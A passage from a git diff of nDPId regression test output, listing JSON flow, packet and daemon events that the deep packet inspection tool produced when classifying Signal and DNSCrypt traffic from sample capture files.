{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1569051264666,"flow_last_seen":1569051265237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17722,"flow_avg_l4_payload_len":466,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1569051247594,"flow_last_seen":1569051257495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3653,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1569051264073,"flow_last_seen":1569051267100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4493,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} 
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":265,"flow_first_seen":1569051267121,"flow_last_seen":1569051267601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":198733,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","packets-captured":637,"packets-processed":637,"total-skipped-flows":0,"total-l4-data-len":273842,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":16,"total-detection-updates":24,"total-updates":0,"current-active-flows":0,"total-active-flows":19,"total-idle-flows":19,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":137,"global_ts_msec":1569051267601} diff --git a/test/results/simple-dnscrypt.pcap.out b/test/results/simple-dnscrypt.pcap.out index 34fa8e2b2..747274cc8 100644 --- a/test/results/simple-dnscrypt.pcap.out +++ b/test/results/simple-dnscrypt.pcap.out 
@@ -1,37 +1,37 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1491813284555} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813284555,"flow_last_seen":1491813284555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813284555,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491813284555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813284555,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PRVAAIAGMNDAqCunhncaGMQ5Abvf\/XrjAAAAAIACIAChWwAAAgQFtAEDAwgBAQQC"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491813284666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813284666,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xDnBW87r3\/165IASchC\/iQAAAgQFHgEBBAIBAwMH"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491813284666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813284666,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPRZAAIAGMNvAqCunhncaGMQ5Abvf\/XrkwVvO7FAQAEBxlgAA"} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813284555,"flow_last_seen":1491813284694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1491813284694,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813284555,"flow_last_seen":1491813284804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1516,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1491813284804,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01256{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1491813284555,"flow_last_seen":1491813284819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6756,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1491813284819,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286275,"flow_last_seen":1491813286275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286275,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491813286275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286275,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSdAAIAGML7AqCunhncaGMRNAbtYb9jbAAAAAIACIADK3QAAAgQFtAEDAwgBAQQC"} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286392,"flow_last_seen":1491813286392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286392,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1491813286392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286392,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PShAAIAGML3AqCunhncaGMRSAbte7A6DAAAAAIACIACOtAAAAgQFtAEDAwgBAQQC"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286393,"flow_last_seen":1491813286393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286393,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1491813286393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286393,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSlAAIAGMLzAqCunhncaGMRTAbtepcAHAAAAAIACIADddQAAAgQFtAEDAwgBAQQC"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491813286463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286463,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xE3jDV\/XWG\/Y3IASchA2bgAAAgQFHgEBBAIBAwMH"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491813286463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286463,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSpAAIAGMMfAqCunhncaGMRNAbtYb9jc4w1f2FAQAEDoegAA"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286275,"flow_last_seen":1491813286464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286464,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1491813286470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286470,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADUGuOWGdxoYwKgrpwG7xFOF+CiKXqXACIASchDdaAAAAgQFHgEBBAIBAwMH"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1491813286470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286470,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSxAAIAGMMXAqCunhncaGMRTAbtepcAIhfgoi1AQAECPdQAA"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286393,"flow_last_seen":1491813286470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286470,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1491813286489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286489,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xFKVdKj9XuwOhIASchD+twAAAgQFHgEBBAIBAwMH"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1491813286489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286489,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPS5AAIAGMMPAqCunhncaGMRSAbte7A6ElXSo\/lAQAECwxAAA"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286392,"flow_last_seen":1491813286491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286491,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286393,"flow_last_seen":1491813286573,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286573,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286393,"flow_last_seen":1491813286577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286577,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} -00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286275,"flow_last_seen":1491813286586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286586,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286275,"flow_last_seen":1491813286594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286594,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} -00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":81,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286392,"flow_last_seen":1491813286609,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286609,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": 
